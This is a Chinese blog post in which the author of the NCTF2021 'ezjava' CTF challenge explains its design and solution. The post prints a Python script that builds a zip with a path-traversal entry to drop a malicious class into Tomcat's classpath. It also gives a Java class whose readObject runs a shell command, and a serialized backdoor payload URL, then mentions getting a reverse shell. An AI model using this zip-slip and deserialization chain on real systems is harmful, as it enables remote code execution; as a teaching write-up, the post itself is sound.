

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.svg">
  <link rel="icon" href="/img/favicon.svg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#17354a">
  <meta name="author" content="Pupi1">
  <meta name="keywords" content="Security Research,Java Security,AI Security,CTF">
  
    <meta name="description" content="NCTF2021ezjava的出题思路">
<meta property="og:type" content="article">
<meta property="og:title" content="NCTF2021ezjava出题思路">
<meta property="og:url" content="https://pupil857.github.io/2021/11/30/NCTF2021ezjava%E5%87%BA%E9%A2%98%E6%80%9D%E8%B7%AF/">
<meta property="og:site_name" content="Pupi1&#39;s Blog">
<meta property="og:description" content="NCTF2021ezjava的出题思路">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pupil857.github.io/2021/11/30/NCTF2021ezjava%E5%87%BA%E9%A2%98%E6%80%9D%E8%B7%AF/image-20211129132240027.png">
<meta property="article:published_time" content="2021-11-30T04:54:10.000Z">
<meta property="article:modified_time" content="2026-03-24T16:53:33.715Z">
<meta property="article:author" content="Pupi1">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="X1cT34m">
<meta property="article:tag" content="NJUPT">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://pupil857.github.io/2021/11/30/NCTF2021ezjava%E5%87%BA%E9%A2%98%E6%80%9D%E8%B7%AF/image-20211129132240027.png">
  
  
  
  <title>NCTF2021ezjava出题思路 | Pupi1&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  



  
<link rel="stylesheet" href="/css/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"pupil857.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 55vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Pupi1</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>链接</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/links/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-link-fill"></i>
                  <span>链接</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/site-hero-post.svg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.15)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="NCTF2021ezjava出题思路"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2021-11-30 12:54" pubdate>
          2021-11-30 12:54
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    

    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">NCTF2021ezjava出题思路</h1>
            
            
              <div class="markdown-body">
                
                <p><strong>NCTF2021ezjava的出题思路</strong></p>

<span id="more"></span>

<h3 id="前言">前言</h3><p>先说说这个的题的背景吧，构思挺久的题目。</p>
<p>当时在学习java安全的时候在看java代码审计那本书，里面有提到jeecms对压缩包的不正确解压导致的目录穿越，当时觉得这个点挺有趣的就打算来出一下，但是直接上传jsp太简单了肯定不行。于是在学习java写文件rce的时候看到了些文章</p>
<p><a href="https://landgrey.me/blog/22/" rel="noopener" target="_blank"></a></p>
<p><a href="https://threedr3am.github.io/2021/04/14/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84SpringBoot%20RCE/" rel="noopener" target="_blank"></a></p>
<p>主要就是对这2篇文章研究了一下进行复现，发现是个很好的方法，一下就拓宽了攻击面。所以打算用这个点来作为最后的rce点</p>
<p>但是在研究的过程中，发现zip的相关操作会去调用<code>charset</code>，导致<code>charsets.jar</code>被加载进去，无法触发。自己也没有发现其他可以利用的jar（太菜惹~</p>
<p>只好作罢去找其他加载类的方法。最终发现java在实现反序列化的时候会去classpath中加载class，所以可以通过这一点去加载恶意的class从而执行恶意代码。</p>
<h3 id="wp">wp</h3><p>这个题其实也是一个在不支持jsp的情况下任意文件写的rce利用</p>
<p>前面部分先对代码进行审计，我们可以上传zip，然后在解压这里发现</p>
<p><img alt="image-20211129132240027" src="/2021/11/30/NCTF2021ezjava%E5%87%BA%E9%A2%98%E6%80%9D%E8%B7%AF/image-20211129132240027.png" srcset="/img/loading.gif" lazyload/></p>
<p>他没有对压缩包文件内的文件进行检查，这里就可以导致解压目录穿越。这里可以通过一个脚本去生成这样的zip：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/><span class="line">10</span><br/><span class="line">11</span><br/><span class="line">12</span><br/></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> zipfile</span><br/><span class="line"><span class="keyword">import</span> os</span><br/><span class="line"> </span><br/><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br/><span class="line">    <span class="keyword">try</span>:</span><br/><span class="line">        </span><br/><span class="line">        zipFile = zipfile.ZipFile(<span class="string">"poc.zip"</span>, <span class="string">"a"</span>, zipfile.ZIP_DEFLATED)</span><br/><span class="line">        info = zipfile.ZipInfo(<span class="string">"poc.zip"</span>)</span><br/><span class="line">        zipFile.write(<span class="string">"poc.class"</span>,<span class="string">"../../usr/local/tomcat/webapps/html/WEB-INF/classes/com/x1c/nctf/Poc.class"</span>,zipfile.ZIP_DEFLATED)</span><br/><span class="line">        zipFile.close()</span><br/><span class="line">    <span class="keyword">except</span> IOError <span class="keyword">as</span> e:</span><br/><span class="line">        <span class="keyword">raise</span> e</span><br/></pre></td></tr></table></figure>
<p>那么我们现在就相当与可以写入任意文件了。那么就是在spring boot运行时并且不支持jsp没有热部署的情况下要如何去rce的问题了</p>
<p>其实这里给了一个后门是用来反序列化，这里的提示其实很明显了，我们就可以把恶意类文件写入到classpath，如何通过反序列化去加载我们恶意类中重新的readObject方法，就可以达成rce。</p>
<p>题目给的附件是war，然后也有tomcat的路径可以很轻松的得到classpath，然后通过unzip把恶意类解压到classpath下，再通过后门的反序列化去触发即可。（这里一开始没给tomcat路径是因为tomcat的路径是默认的而且可以通过zip路由去确认是否存在该路径，但是一直没有解就当hint去提示师傅们了：）</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br/><span class="line">2</span><br/><span class="line">3</span><br/><span class="line">4</span><br/><span class="line">5</span><br/><span class="line">6</span><br/><span class="line">7</span><br/><span class="line">8</span><br/><span class="line">9</span><br/><span class="line">10</span><br/><span class="line">11</span><br/><span class="line">12</span><br/><span class="line">13</span><br/><span class="line">14</span><br/><span class="line">15</span><br/><span class="line">16</span><br/><span class="line">17</span><br/><span class="line">18</span><br/><span class="line">19</span><br/><span class="line">20</span><br/><span class="line">21</span><br/><span class="line">22</span><br/><span class="line">23</span><br/><span class="line">24</span><br/></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.x1c.nctf;</span><br/><span class="line"></span><br/><span class="line"><span class="keyword">import</span> java.io.*;</span><br/><span class="line"><span class="keyword">import</span> java.io.Serializable;</span><br/><span class="line"><span class="keyword">import</span> com.x1c.nctf.Tool.*;</span><br/><span class="line"></span><br/><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Poc</span> <span class="keyword">implements</span> <span class="title">Serializable</span> </span>{</span><br/><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">Poc</span><span class="params">()</span> </span>{</span><br/><span class="line">    }</span><br/><span class="line"></span><br/><span class="line">    <span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">writeObject</span><span class="params">(ObjectInputStream out)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException </span>{</span><br/><span class="line">        out.defaultReadObject();</span><br/><span class="line">    }</span><br/><span class="line"></span><br/><span class="line">    <span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">readObject</span><span class="params">(ObjectInputStream in)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException </span>{</span><br/><span class="line">        in.defaultReadObject();</span><br/><span class="line">        Runtime.getRuntime().exec(<span class="string">"touch /tmp/1.txt"</span>);</span><br/><span class="line">    }</span><br/><span class="line"></span><br/><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br/><span class="line">        Poc o = <span class="keyword">new</span> Poc();</span><br/><span class="line">        System.out.println(Tool.base64Encode(Tool.serialize(o)));</span><br/><span class="line">    }</span><br/><span class="line">}</span><br/></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br/></pre></td><td class="code"><pre><span class="line">backdoor?cmd=rO0ABXNyABBjb20ueDFjLm5jdGYuUG9jLTxEyChKw8gCAAB4cA==</span><br/></pre></td></tr></table></figure>
<p>反弹shell就可以了</p>
<h3 id="尾声">尾声</h3><p>比赛中题目环境一直出问题，还请各位师傅谅解，主要还是希望和师傅们分享这样一种思路，感谢各位师傅的捧场。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CTF/" class="print-no-link">#CTF</a>
      
        <a href="/tags/Web/" class="print-no-link">#Web</a>
      
        <a href="/tags/X1cT34m/" class="print-no-link">#X1cT34m</a>
      
        <a href="/tags/NJUPT/" class="print-no-link">#NJUPT</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/12/05/cndv/" title="记自己的第一个漏洞">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">记自己的第一个漏洞</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/11/30/2021%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91webwp/" title="2021西湖论剑webwp">
                        <span class="hidden-mobile">2021西湖论剑webwp</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <span>© Pupi1</span> <span class="mx-1">|</span> <span>Built with Hexo and Fluid</span> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
